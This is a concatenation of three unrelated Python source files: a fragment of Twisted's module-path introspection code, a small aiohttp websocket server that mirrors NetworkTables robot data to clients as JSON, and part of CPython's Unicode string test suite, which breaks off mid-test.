def __repr__(self):
return 'PythonAttribute<%r>'%(self.name,)
def isLoaded(self):
"""
Return a boolean describing whether the attribute this describes has
actually been loaded into memory by importing its module.
Note: this currently always returns true; there is no Python parser
support in this module yet.
"""
return self._loaded
def load(self, default=_nothing):
"""
Load the value associated with this attribute.
@return: an arbitrary Python object, or 'default' if there is an error
loading it.
"""
return self.pythonValue
def iterAttributes(self):
for name, val in inspect.getmembers(self.load()):
yield PythonAttribute(self.name+'.'+name, self, True, val)
class PythonModule(_ModuleIteratorHelper):
"""
Representation of a module which could be imported from sys.path.
@ivar name: the fully qualified python name of this module.
@ivar filePath: a FilePath-like object which points to the location of this
module.
@ivar pathEntry: a L{PathEntry} instance which this module was located
from.
"""
def __init__(self, name, filePath, pathEntry):
"""
Create a PythonModule. Do not construct this directly, instead inspect a
PythonPath or other PythonModule instances.
@param name: see ivar
@param filePath: see ivar
@param pathEntry: see ivar
"""
assert not name.endswith(".__init__")
self.name = name
self.filePath = filePath
self.parentPath = filePath.parent()
self.pathEntry = pathEntry
def _getEntry(self):
return self.pathEntry
def __repr__(self):
"""
Return a string representation including the module name.
"""
return 'PythonModule<%r>' % (self.name,)
def isLoaded(self):
"""
Determine if the module is loaded into sys.modules.
@return: a boolean: true if loaded, false if not.
"""
return self.name in self.pathEntry.pythonPath.moduleDict
def iterAttributes(self):
"""
List all the attributes defined in this module.
Note: Future work is planned here to make it possible to list python
attributes on a module without loading the module by inspecting ASTs or
bytecode, but currently any iteration of PythonModule objects insists
they must be loaded, and will use inspect.getmodule.
@raise NotImplementedError: if this module is not loaded.
@return: a generator yielding PythonAttribute instances describing the
attributes of this module.
"""
if not self.isLoaded():
raise NotImplementedError(
"You can't load attributes from non-loaded modules yet.")
for name, val in inspect.getmembers(self.load()):
yield PythonAttribute(self.name+'.'+name, self, True, val)
def isPackage(self):
"""
Returns true if this module is also a package, and might yield something
from iterModules.
"""
return _isPackagePath(self.filePath)
def load(self, default=_nothing):
"""
Load this module.
@param default: if specified, the value to return in case of an error.
@return: a genuine python module.
@raise: any type of exception. Importing modules is a risky business;
the erorrs of any code run at module scope may be raised from here, as
well as ImportError if something bizarre happened to the system path
between the discovery of this PythonModule object and the attempt to
import it. If you specify a default, the error will be swallowed
entirely, and not logged.
@rtype: types.ModuleType.
"""
try:
return self.pathEntry.pythonPath.moduleLoader(self.name)
except: # this needs more thought...
if default is not _nothing:
return default
raise
def __eq__(self, other):
"""
PythonModules with the same name are equal.
"""
if not isinstance(other, PythonModule):
return False
return other.name == self.name
def __ne__(self, other):
"""
PythonModules with different names are not equal.
"""
if not isinstance(other, PythonModule):
return True
return other.name != self.name
def walkModules(self, importPackages=False):
if importPackages and self.isPackage():
self.load()
return super(PythonModule, self).walkModules(importPackages=importPackages)
def _subModuleName(self, mn):
"""
submodules of this module are prefixed with our name.
"""
return self.name + '.' + mn
def _packagePaths(self):
"""
Yield a sequence of FilePath-like objects which represent path segments.
"""
if not self.isPackage():
return
if self.isLoaded():
load = self.load()
if hasattr(load, '__path__'):
for fn in load.__path__:
if fn == self.parentPath.path:
# this should _really_ exist.
assert self.parentPath.exists()
yield self.parentPath
else:
smp = self.pathEntry.pythonPath._smartPath(fn)
if smp.exists():
yield smp
else:
yield self.parentPath
class PathEntry(_ModuleIteratorHelper):
"""
I am a proxy for a single entry on sys.path.
@ivar filePath: a FilePath-like object pointing at the filesystem location
or archive file where this path entry is stored.
@ivar pythonPath: a PythonPath instance.
"""
def __init__(self, filePath, pythonPath):
"""
Create a PathEntry. This is a private constructor.
"""
self.filePath = filePath
self.pythonPath = pythonPath
def _getEntry(self):
return self
def __repr__(self):
return 'PathEntry<%r>' % (self.filePath,)
def _packagePaths(self):
yield self.filePath
class IPathImportMapper(Interface):
"""
This is an internal interface, used to map importers to factories for
FilePath-like objects.
"""
def mapPath(self, pathLikeString):
"""
Return a FilePath-like object.
@param pathLikeString: a path-like string, like one that might be
passed to an import hook.
@return: a L{FilePath}, or something like it (currently only a
L{ZipPath}, but more might be added later).
"""
class _DefaultMapImpl:
""" Wrapper for the default importer, i.e. None. """
implements(IPathImportMapper)
def mapPath(self, fsPathString):
return FilePath(fsPathString)
_theDefaultMapper = _DefaultMapImpl()
class _ZipMapImpl:
""" IPathImportMapper implementation for zipimport.ZipImporter. """
implements(IPathImportMapper)
def __init__(self, importer):
self.importer = importer
def mapPath(self, fsPathString):
"""
Map the given FS path to a ZipPath, by looking at the ZipImporter's
"archive" attribute and using it as our ZipArchive root, then walking
down into the archive from there.
@return: a L{zippath.ZipPath} or L{zippath.ZipArchive} instance.
"""
za = ZipArchive(self.importer.archive)
myPath = FilePath(self.importer.archive)
itsPath = FilePath(fsPathString)
if myPath == itsPath:
return za
# This is NOT a general-purpose rule for sys.path or __file__:
# zipimport specifically uses regular OS path syntax in its pathnames,
# even though zip files specify that slashes are always the separator,
# regardless of platform.
segs = itsPath.segmentsFrom(myPath)
zp = za
for seg in segs:
zp = zp.child(seg)
return zp
registerAdapter(_ZipMapImpl, zipimport.zipimporter, IPathImportMapper)
def _defaultSysPathFactory():
"""
Provide the default behavior of PythonPath's sys.path factory, which is to
return the current value of sys.path.
@return: L{sys.path}
"""
return sys.path
class PythonPath:
"""
I represent the very top of the Python object-space, the module list in
sys.path and the modules list in sys.modules.
@ivar _sysPath: a sequence of strings like sys.path. This attribute is
read-only.
@ivar moduleDict: a dictionary mapping string module names to module
objects, like sys.modules.
@ivar sysPathHooks: a list of PEP-302 path hooks, like sys.path_hooks.
@ivar moduleLoader: a function that takes a fully-qualified python name and
returns a module, like twisted.python.reflect.namedAny.
"""
def __init__(self,
sysPath=None,
moduleDict=sys.modules,
sysPathHooks=sys.path_hooks,
importerCache=sys.path_importer_cache,
moduleLoader=namedAny,
sysPathFactory=None):
"""
Create a PythonPath. You almost certainly want to use
modules.theSystemPath, or its aliased methods, rather than creating a
new instance yourself, though.
All parameters are optional, and if unspecified, will use 'system'
equivalents that makes this PythonPath like the global L{theSystemPath}
instance.
@param sysPath: a sys.path-like list to use for this PythonPath, to
specify where to load modules from.
@param moduleDict: a sys.modules-like dictionary to use for keeping
track of what modules this PythonPath has loaded.
@param sysPathHooks: sys.path_hooks-like list of PEP-302 path hooks to
be used for this PythonPath, to determie which importers should be
used.
@param importerCache: a sys.path_importer_cache-like list of PEP-302
importers. This will be used in conjunction with the given
sysPathHooks.
@param moduleLoader: a module loader function which takes a string and
returns a module. That is to say, it is like L{namedAny} - *not* like
L{__import__}.
@param sysPathFactory: a 0-argument callable which returns the current
value of a sys.path-like list of strings. Specify either this, or
sysPath, not both. This alternative interface is provided because the
way the Python import mechanism works, you can re-bind the 'sys.path'
name and that is what is used for current imports, so it must be a
factory rather than a value to deal with modification by rebinding
rather than modification by mutation. Note: it is not recommended to
rebind sys.path. Although this mechanism can deal with that, it is a
subtle point which some tools that it is easy for tools which interact
with sys.path to miss.
"""
if sysPath is not None:
sysPathFactory = lambda : sysPath
elif sysPathFactory is None:
sysPathFactory = _defaultSysPathFactory
self._sysPathFactory = sysPathFactory
self._sysPath = sysPath
self.moduleDict = moduleDict
self.sysPathHooks = sysPathHooks
self.importerCache = importerCache
self.moduleLoader = moduleLoader
def _getSysPath(self):
"""
Retrieve the current value of the module search path list.
"""
return self._sysPathFactory()
sysPath = property(_getSysPath)
def _findEntryPathString(self, modobj):
"""
Determine where a given Python module object came from by looking at path
entries.
"""
topPackageObj = modobj
while '.' in topPackageObj.__name__:
topPackageObj = self.moduleDict['.'.join(
topPackageObj.__name__.split('.')[:-1])]
if _isPackagePath(FilePath(topPackageObj.__file__)):
# if package 'foo' is on sys.path at /a/b/foo, package 'foo's
# __file__ will be /a/b/foo/__init__.py, and we are looking for
# /a/b here, the path-entry; so go up two steps.
rval = dirname(dirname(topPackageObj.__file__))
else:
# the module is completely top-level, not within any packages. The
# path entry it's on is just its dirname.
rval = dirname(topPackageObj.__file__)
# There are probably some awful tricks that an importer could pull
# which would break this, so let's just make sure... it's a loaded
# module after all, which means that its path MUST be in
# path_importer_cache according to PEP 302 -glyph
if rval not in self.importerCache:
warnings.warn(
"%s (for module %s) not in path importer cache "
"(PEP 302 violation - check your local configuration)." % (
rval, modobj.__name__),
stacklevel=3)
return rval
def _smartPath(self, pathName):
"""
Given a path entry from sys.path which may refer to an importer,
return the appropriate FilePath-like instance.
@param pathName: a str describing the path.
@return: a FilePath-like object.
"""
importr = self.importerCache.get(pathName, _nothing)
if importr is _nothing:
for hook in self.sysPathHooks:
try:
importr = hook(pathName)
except ImportError, ie:
pass
if importr is _nothing: # still
importr = None
return IPathImportMapper(importr, _theDefaultMapper).mapPath(pathName)
def iterEntries(self):
"""
Iterate the entries on my sysPath.
@return: a generator yielding PathEntry objects
"""
for pathName in self.sysPath:
fp = self._smartPath(pathName)
yield PathEntry(fp, self)
def __getitem__(self, modname):
"""
Get a python module by a given fully-qualified name.
@return: a PythonModule object.
@raise: KeyError, if the module name is a module name.
"""
# See if the module is already somewhere in Python-land.
if modname in self.moduleDict:
# we need 2 paths; one of the path entry and one for the module.
moduleObject = self.moduleDict[modname]
pe = PathEntry(
self._smartPath(
self._findEntryPathString(moduleObject)),
self)
mp = self._smartPath(moduleObject.__file__)
return PythonModule(modname, mp, pe)
# Recurse if we're trying to get a submodule.
if '.' in modname:
pkg = self
for name in modname.split('.'):
pkg = pkg[name]
return pkg
# Finally do the slowest possible thing and iterate
for module in self.iterModules():
if module.name == modname:
return module
raise KeyError(modname)
def __repr__(self):
"""
Display my sysPath and moduleDict in a string representation.
"""
return "PythonPath(%r,%r)" % (self.sysPath, self.moduleDict)
def iterModules(self):
"""
Yield all top-level modules on my sysPath.
"""
for entry in self.iterEntries():
for module in entry.iterModules():
yield module
def walkModules(self, importPackages=False):
"""
Similar to L{iterModules}, this yields every module on the path, then every
submodule in each package or entry.
"""
for package in self.iterModules():
for module in package.walkModules(importPackages=False):
yield module
theSystemPath = PythonPath()
def walkModules(importPackages=False):
"""
Deeply iterate all modules on the global python path.
@param importPackages: Import packages as they are seen.
"""
return theSystemPath.walkModules(importPackages=importPackages)
def iterModules():
"""
Iterate all modules and top-level packages on the global Python path, but
do not descend into packages.
@param importPackages: Import packages as they are seen.
"""
return theSystemPath.iterModules()
def getModule(moduleName):
"""
Retrieve a module from the system path.
"""
return theSystemPath[moduleName]
| |
from networktables import NetworkTable
from networktables2.type import ArrayData, BooleanArray, NumberArray, StringArray
import asyncio
import json
import math
from aiohttp import web, errors as weberrors
from threading import RLock
from copy import deepcopy
ip_address = "127.0.0.1"
initialized_networktables = False
table_data = dict()
table_data_lock = RLock()
root_table = None
connections = list()
tagged_tables = list()
class ConnectionListener:
def connected(self, table):
set_local_value("~CONNECTED~", True)
def disconnected(self, table):
set_local_value("~CONNECTED~", False)
def val_listener(key, value, isNew):
set_local_value(key, value, force_type=True)
def get_local_value(key):
with table_data_lock:
if key[0] == NetworkTable.PATH_SEPARATOR:
key = key[1:]
value = table_data
for s in key.split(NetworkTable.PATH_SEPARATOR):
if isinstance(value, list):
s = int(s)
if len(value) <= s:
return None
value = value[s]
else:
if s not in value:
return None
value = value[s]
return value
def set_local_value(key, value, force_type=False):
with table_data_lock:
if isinstance(value, float) and (math.isnan(value) or math.isinf(value)):
value = 0.0
if key[0] == NetworkTable.PATH_SEPARATOR:
key = key[1:]
keysplit = key.split(NetworkTable.PATH_SEPARATOR)
value_key = keysplit[-1:][0]
table_key = keysplit[:-1]
target_table = table_data
for s in table_key:
if s not in target_table:
target_table[s] = dict()
target_table = target_table[s]
# Save the value if it is new
if value_key == "":
return
if value_key in target_table and not force_type:
value = type(target_table[value_key])(value)
if isinstance(target_table, dict):
target_table[value_key] = value
elif isinstance(target_table, list):
target_table[int(value_key)] = value
else:
raise ValueError("Unknown Table Type {}".format(type(target_table)))
trigger_update()
def trigger_update():
for con in connections:
con["updated_data"] = True
def set_value(key, value):
try:
current_value = get_local_value(key)
if current_value is not None:
value = to_type(value, type(current_value))
if key[0] == NetworkTable.PATH_SEPARATOR:
key = key[1:]
# First check if value is part of a list
parent_object = None
if NetworkTable.PATH_SEPARATOR in key:
final_sep_idx = key.rfind(NetworkTable.PATH_SEPARATOR)
parent_path = key[:final_sep_idx]
key_end = key[final_sep_idx+1:]
parent_object = root_table.getValue(parent_path, None)
if isinstance(parent_object, list):
parent_object[int(key_end)] = value
if isinstance(value, bool):
new_arraydata = BooleanArray()
elif isinstance(value, float) or isinstance(value, int):
new_arraydata = NumberArray()
else:
new_arraydata = StringArray()
new_arraydata.extend(parent_object)
root_table.putValue(parent_path, new_arraydata)
else:
if isinstance(value, bool):
root_table.putBoolean(key, value)
elif isinstance(value, float) or isinstance(value, int):
root_table.putNumber(key, value)
else:
root_table.putString(key, str(value))
except Exception as e:
print(e)
finally:
trigger_update()
def to_type(value, target_type):
value = str(value)
if target_type is bool:
return value.lower() in ("yes", "true", "t", "1")
elif target_type is int or target_type is float:
return float(value)
else:
return value
def setup_networktables(ip=ip_address):
global root_table, table_data, initialized_networktables
if initialized_networktables:
return
NetworkTable.setIPAddress(ip)
NetworkTable.setClientMode()
NetworkTable.initialize()
root_table = NetworkTable.getTable("")
c_listener = ConnectionListener()
root_table.addConnectionListener(c_listener)
root_table.addGlobalListener(val_listener, True)
initialized_networktables = True
@asyncio.coroutine
def networktables_websocket(request):
# Setup websocket
ws = web.WebSocketResponse()
ws.start(request)
# Setup connection dict
con_id = len(connections)
with table_data_lock:
connection = {"socket": ws, "updated_data": True}
connections.append(connection)
print("NT Websocket {} Connected".format(con_id))
# Start listener coroutine
asyncio.async(networktables_websocket_listener(ws))
# Set IP status data
ip = request.transport.get_extra_info("sockname")[0]
set_local_value("~SERVER_IP~", ip)
last_data = dict()
# Update periodically until the websocket is closed.
try:
while True:
yield from asyncio.sleep(1)
while True:
yield from asyncio.sleep(.1)
if connection["updated_data"]:
connection["updated_data"] = False
updates = dict_delta(last_data, table_data)
string_data = json.dumps(updates)
#print("Sending " + string_data)
ws.send_str(string_data)
last_data = deepcopy(table_data)
if ws.closing:
break
if ws.closing:
break
except weberrors.ClientDisconnectedError or weberrors.WSClientDisconnectedError:
print("Client Disconnected")
finally:
print("NT Websocket {} Disconnected".format(con_id))
with table_data_lock:
connections.remove(connection)
return ws
def dict_delta(dict_a, dict_b):
"""
recursively compares two dictionaries, returns the dictionary of differences.
aka retval = dict_b - dict_a
"""
result = dict()
for k in dict_b:
if k in dict_a:
if isinstance(dict_a[k], dict) and isinstance(dict_b[k], dict):
comp_res = dict_delta(dict_a[k], dict_b[k])
if len(comp_res) > 0:
result[k] = comp_res
elif dict_a[k] != dict_b[k]:
result[k] = dict_b[k]
else:
result[k] = dict_b[k]
return result
@asyncio.coroutine
def networktables_websocket_listener(ws):
while True:
try:
jdata = yield from ws.receive_str()
#print("Recieved " + jdata)
except Exception:
return
data = json.loads(jdata)
set_value(data["key"], data["value"])
| |
# -*- coding: iso-8859-1 -*-
""" Test script for the Unicode implementation.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""#"
import sys, struct, codecs
from test import test_support, string_tests
# Error handling (bad decoder return)
def search_function(encoding):
def decode1(input, errors="strict"):
return 42 # not a tuple
def encode1(input, errors="strict"):
return 42 # not a tuple
def encode2(input, errors="strict"):
return (42, 42) # no unicode
def decode2(input, errors="strict"):
return (42, 42) # no unicode
if encoding=="test.unicode1":
return (encode1, decode1, None, None)
elif encoding=="test.unicode2":
return (encode2, decode2, None, None)
else:
return None
codecs.register(search_function)
class UnicodeTest(
string_tests.CommonTest,
string_tests.MixinStrUnicodeUserStringTest,
string_tests.MixinStrUnicodeTest,
):
type2test = unicode
def checkequalnofix(self, result, object, methodname, *args):
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assert_(type(realresult) is type(result))
# if the original is returned make sure that
# this doesn't happen with subclasses
if realresult is object:
class usub(unicode):
def __repr__(self):
return 'usub(%r)' % unicode.__repr__(self)
object = usub(object)
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assert_(object is not realresult)
def test_literals(self):
self.assertEqual(u'\xff', u'\u00ff')
self.assertEqual(u'\uffff', u'\U0000ffff')
self.assertRaises(SyntaxError, eval, 'u\'\\Ufffffffe\'')
self.assertRaises(SyntaxError, eval, 'u\'\\Uffffffff\'')
self.assertRaises(SyntaxError, eval, 'u\'\\U%08x\'' % 0x110000)
def test_repr(self):
if not sys.platform.startswith('java'):
# Test basic sanity of repr()
self.assertEqual(repr(u'abc'), "u'abc'")
self.assertEqual(repr(u'ab\\c'), "u'ab\\\\c'")
self.assertEqual(repr(u'ab\\'), "u'ab\\\\'")
self.assertEqual(repr(u'\\c'), "u'\\\\c'")
self.assertEqual(repr(u'\\'), "u'\\\\'")
self.assertEqual(repr(u'\n'), "u'\\n'")
self.assertEqual(repr(u'\r'), "u'\\r'")
self.assertEqual(repr(u'\t'), "u'\\t'")
self.assertEqual(repr(u'\b'), "u'\\x08'")
self.assertEqual(repr(u"'\""), """u'\\'"'""")
self.assertEqual(repr(u"'\""), """u'\\'"'""")
self.assertEqual(repr(u"'"), '''u"'"''')
self.assertEqual(repr(u'"'), """u'"'""")
latin1repr = (
"u'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
"\\x1b\\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHI"
"JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
"\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
"\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9"
"\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7"
"\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5"
"\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3"
"\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1"
"\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef"
"\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd"
"\\xfe\\xff'")
testrepr = repr(u''.join(map(unichr, xrange(256))))
self.assertEqual(testrepr, latin1repr)
# Test repr works on wide unicode escapes without overflow.
self.assertEqual(repr(u"\U00010000" * 39 + u"\uffff" * 4096),
repr(u"\U00010000" * 39 + u"\uffff" * 4096))
def test_count(self):
string_tests.CommonTest.test_count(self)
# check mixed argument types
self.checkequalnofix(3, 'aaa', 'count', u'a')
self.checkequalnofix(0, 'aaa', 'count', u'b')
self.checkequalnofix(3, u'aaa', 'count', 'a')
self.checkequalnofix(0, u'aaa', 'count', 'b')
self.checkequalnofix(0, u'aaa', 'count', 'b')
self.checkequalnofix(1, u'aaa', 'count', 'a', -1)
self.checkequalnofix(3, u'aaa', 'count', 'a', -10)
self.checkequalnofix(2, u'aaa', 'count', 'a', 0, -1)
self.checkequalnofix(0, u'aaa', 'count', 'a', 0, -10)
def test_find(self):
self.checkequalnofix(0, u'abcdefghiabc', 'find', u'abc')
self.checkequalnofix(9, u'abcdefghiabc', 'find', u'abc', 1)
self.checkequalnofix(-1, u'abcdefghiabc', 'find', u'def', 4)
self.assertRaises(TypeError, u'hello'.find)
self.assertRaises(TypeError, u'hello'.find, 42)
def test_rfind(self):
string_tests.CommonTest.test_rfind(self)
# check mixed argument types
self.checkequalnofix(9, 'abcdefghiabc', 'rfind', u'abc')
self.checkequalnofix(12, 'abcdefghiabc', 'rfind', u'')
self.checkequalnofix(12, u'abcdefghiabc', 'rfind', '')
def test_index(self):
string_tests.CommonTest.test_index(self)
# check mixed argument types
for (t1, t2) in ((str, unicode), (unicode, str)):
self.checkequalnofix(0, t1('abcdefghiabc'), 'index', t2(''))
self.checkequalnofix(3, t1('abcdefghiabc'), 'index', t2('def'))
self.checkequalnofix(0, t1('abcdefghiabc'), 'index', t2('abc'))
self.checkequalnofix(9, t1('abcdefghiabc'), 'index', t2('abc'), 1)
self.assertRaises(ValueError, t1('abcdefghiabc').index, t2('hib'))
self.assertRaises(ValueError, t1('abcdefghiab').index, t2('abc'), 1)
self.assertRaises(ValueError, t1('abcdefghi').index, t2('ghi'), 8)
self.assertRaises(ValueError, t1('abcdefghi').index, t2('ghi'), -1)
def test_rindex(self):
string_tests.CommonTest.test_rindex(self)
# check mixed argument types
for (t1, t2) in ((str, unicode), (unicode, str)):
self.checkequalnofix(12, t1('abcdefghiabc'), 'rindex', t2(''))
self.checkequalnofix(3, t1('abcdefghiabc'), 'rindex', t2('def'))
self.checkequalnofix(9, t1('abcdefghiabc'), 'rindex', t2('abc'))
self.checkequalnofix(0, t1('abcdefghiabc'), 'rindex', t2('abc'), 0, -1)
self.assertRaises(ValueError, t1('abcdefghiabc').rindex, t2('hib'))
self.assertRaises(ValueError, t1('defghiabc').rindex, t2('def'), 1)
self.assertRaises(ValueError, t1('defghiabc').rindex, t2('abc'), 0, -1)
self.assertRaises(ValueError, t1('abcdefghi').rindex, t2('ghi'), 0, 8)
self.assertRaises(ValueError, t1('abcdefghi').rindex, t2('ghi'), 0, -1)
def test_translate(self):
self.checkequalnofix(u'bbbc', u'abababc', 'translate', {ord('a'):None})
self.checkequalnofix(u'iiic', u'abababc', 'translate', {ord('a'):None, ord('b'):ord('i')})
self.checkequalnofix(u'iiix', u'abababc', 'translate', {ord('a'):None, ord('b'):ord('i'), ord('c'):u'x'})
self.checkequalnofix(u'<i><i><i>c', u'abababc', 'translate', {ord('a'):None, ord('b'):u'<i>'})
self.checkequalnofix(u'c', u'abababc', 'translate', {ord('a'):None, ord('b'):u''})
self.checkequalnofix(u'xyyx', u'xzx', 'translate', {ord('z'):u'yy'})
self.assertRaises(TypeError, u'hello'.translate)
self.assertRaises(TypeError, u'abababc'.translate, {ord('a'):''})
def test_split(self):
string_tests.CommonTest.test_split(self)
# Mixed arguments
self.checkequalnofix([u'a', u'b', u'c', u'd'], u'a//b//c//d', 'split', '//')
self.checkequalnofix([u'a', u'b', u'c', u'd'], 'a//b//c//d', 'split', u'//')
self.checkequalnofix([u'endcase ', u''], u'endcase test', 'split', 'test')
def test_join(self):
string_tests.MixinStrUnicodeUserStringTest.test_join(self)
# mixed arguments
self.checkequalnofix(u'a b c d', u' ', 'join', ['a', 'b', u'c', u'd'])
self.checkequalnofix(u'abcd', u'', 'join', (u'a', u'b', u'c', u'd'))
self.checkequalnofix(u'w x y z', u' ', 'join', string_tests.Sequence('wxyz'))
self.checkequalnofix(u'a b c d', ' ', 'join', [u'a', u'b', u'c', u'd'])
self.checkequalnofix(u'a b c d', ' ', 'join', ['a', 'b', u'c', u'd'])
self.checkequalnofix(u'abcd', '', 'join', (u'a', u'b', u'c', u'd'))
self.checkequalnofix(u'w x y z', ' ', 'join', string_tests.Sequence(u'wxyz'))
def test_strip(self):
string_tests.CommonTest.test_strip(self)
self.assertRaises(UnicodeError, u"hello".strip, "\xff")
def test_replace(self):
string_tests.CommonTest.test_replace(self)
# method call forwarded from str implementation because of unicode argument
self.checkequalnofix(u'one@two!three!', 'one!two!three!', 'replace', u'!', u'@', 1)
self.assertRaises(TypeError, 'replace'.replace, u"r", 42)
def test_comparison(self):
# Comparisons:
self.assertEqual(u'abc', 'abc')
self.assertEqual('abc', u'abc')
self.assertEqual(u'abc', u'abc')
self.assert_(u'abcd' > 'abc')
self.assert_('abcd' > u'abc')
self.assert_(u'abcd' > u'abc')
self.assert_(u'abc' < 'abcd')
self.assert_('abc' < u'abcd')
self.assert_(u'abc' < u'abcd')
if 0:
# Move these tests to a Unicode collation module test...
# Testing UTF-16 code point order comparisons...
# No surrogates, no fixup required.
self.assert_(u'\u0061' < u'\u20ac')
# Non surrogate below surrogate value, no fixup required
self.assert_(u'\u0061' < u'\ud800\udc02')
# Non surrogate above surrogate value, fixup required
def test_lecmp(s, s2):
self.assert_(s < s2)
def test_fixup(s):
s2 = u'\ud800\udc01'
test_lecmp(s, s2)
s2 = u'\ud900\udc01'
test_lecmp(s, s2)
s2 = u'\uda00\udc01'
test_lecmp(s, s2)
s2 = u'\udb00\udc01'
test_lecmp(s, s2)
s2 = u'\ud800\udd01'
test_lecmp(s, s2)
s2 = u'\ud900\udd01'
test_lecmp(s, s2)
s2 = u'\uda00\udd01'
test_lecmp(s, s2)
s2 = u'\udb00\udd01'
test_lecmp(s, s2)
s2 = u'\ud800\ude01'
test_lecmp(s, s2)
s2 = u'\ud900\ude01'
test_lecmp(s, s2)
s2 = u'\uda00\ude01'
test_lecmp(s, s2)
s2 = u'\udb00\ude01'
test_lecmp(s, s2)
s2 = u'\ud800\udfff'
test_lecmp(s, s2)
s2 = u'\ud900\udfff'
test_lecmp(s, s2)
s2 = u'\uda00\udfff'
test_lecmp(s, s2)
s2 = u'\udb00\udfff'
test_lecmp(s, s2)
test_fixup(u'\ue000')
test_fixup(u'\uff61')
# Surrogates on both sides, no fixup required
self.assert_(u'\ud800\udc02' < u'\ud84d\udc56')
def test_islower(self):
string_tests.MixinStrUnicodeUserStringTest.test_islower(self)
self.checkequalnofix(False, u'\u1FFc', 'islower')
def test_isupper(self):
string_tests.MixinStrUnicodeUserStringTest.test_isupper(self)
if not sys.platform.startswith('java'):
self.checkequalnofix(False, u'\u1FFc', 'isupper')
def test_istitle(self):
string_tests.MixinStrUnicodeUserStringTest.test_title(self)
self.checkequalnofix(True, u'\u1FFc', 'istitle')
self.checkequalnofix(True, u'Greek \u1FFcitlecases ...', 'istitle')
def test_isspace(self):
string_tests.MixinStrUnicodeUserStringTest.test_isspace(self)
self.checkequalnofix(True, u'\u2000', 'isspace')
self.checkequalnofix(True, u'\u200a', 'isspace')
self.checkequalnofix(False, u'\u2014', 'isspace')
def test_isalpha(self):
string_tests.MixinStrUnicodeUserStringTest.test_isalpha(self)
self.checkequalnofix(True, u'\u1FFc', 'isalpha')
def test_isdecimal(self):
self.checkequalnofix(False, u'', 'isdecimal')
self.checkequalnofix(False, u'a', 'isdecimal')
self.checkequalnofix(True, u'0', 'isdecimal')
self.checkequalnofix(False, u'\u2460', 'isdecimal') # CIRCLED DIGIT ONE
self.checkequalnofix(False, u'\xbc', 'isdecimal') # VULGAR FRACTION ONE QUARTER
self.checkequalnofix(True, u'\u0660', 'isdecimal') # ARABIC-INDIC DIGIT ZERO
self.checkequalnofix(True, u'0123456789', 'isdecimal')
self.checkequalnofix(False, u'0123456789a', 'isdecimal')
self.checkraises(TypeError, 'abc', 'isdecimal', 42)
def test_isdigit(self):
string_tests.MixinStrUnicodeUserStringTest.test_isdigit(self)
self.checkequalnofix(True, u'\u2460', 'isdigit')
self.checkequalnofix(False, u'\xbc', 'isdigit')
self.checkequalnofix(True, u'\u0660', 'isdigit')
def test_isnumeric(self):
self.checkequalnofix(False, u'', 'isnumeric')
self.checkequalnofix(False, u'a', 'isnumeric')
self.checkequalnofix(True, u'0', 'isnumeric')
self.checkequalnofix(True, u'\u2460', 'isnumeric')
self.checkequalnofix(True, u'\xbc', 'isnumeric')
self.checkequalnofix(True, u'\u0660', 'isnumeric')
self.checkequalnofix(True, u'0123456789', 'isnumeric')
self.checkequalnofix(False, u'0123456789a', 'isnumeric')
self.assertRaises(TypeError, u"abc".isnumeric, 42)
def test_contains(self):
# Testing Unicode contains method
self.assert_('a' in u'abdb')
self.assert_('a' in u'bdab')
self.assert_('a' in u'bdaba')
self.assert_('a' in u'bdba')
self.assert_('a' in u'bdba')
self.assert_(u'a' in u'bdba')
self.assert_(u'a' not in u'bdb')
self.assert_(u'a' not in 'bdb')
self.assert_(u'a' in 'bdba')
self.assert_(u'a' in ('a',1,None))
self.assert_(u'a' in (1,None,'a'))
self.assert_(u'a' in (1,None,u'a'))
self.assert_('a' in ('a',1,None))
self.assert_('a' in (1,None,'a'))
self.assert_('a' in (1,None,u'a'))
self.assert_('a' not in ('x',1,u'y'))
self.assert_('a' not in ('x',1,None))
self.assert_(u'abcd' not in u'abcxxxx')
self.assert_(u'ab' in u'abcd')
self.assert_('ab' in u'abc')
self.assert_(u'ab' in 'abc')
self.assert_(u'ab' in (1,None,u'ab'))
self.assert_(u'' in u'abc')
self.assert_('' in u'abc')
# If the following fails either
# the contains operator does not propagate UnicodeErrors or
# someone has changed the default encoding
self.assertRaises(UnicodeError, 'g\xe2teau'.__contains__, u'\xe2')
self.assert_(u'' in '')
self.assert_('' in u'')
self.assert_(u'' in u'')
self.assert_(u'' in 'abc')
self.assert_('' in u'abc')
self.assert_(u'' in u'abc')
self.assert_(u'\0' not in 'abc')
self.assert_('\0' not in u'abc')
self.assert_(u'\0' not in u'abc')
self.assert_(u'\0' in '\0abc')
self.assert_('\0' in u'\0abc')
self.assert_(u'\0' in u'\0abc')
self.assert_(u'\0' in 'abc\0')
self.assert_('\0' in u'abc\0')
self.assert_(u'\0' in u'abc\0')
self.assert_(u'a' in '\0abc')
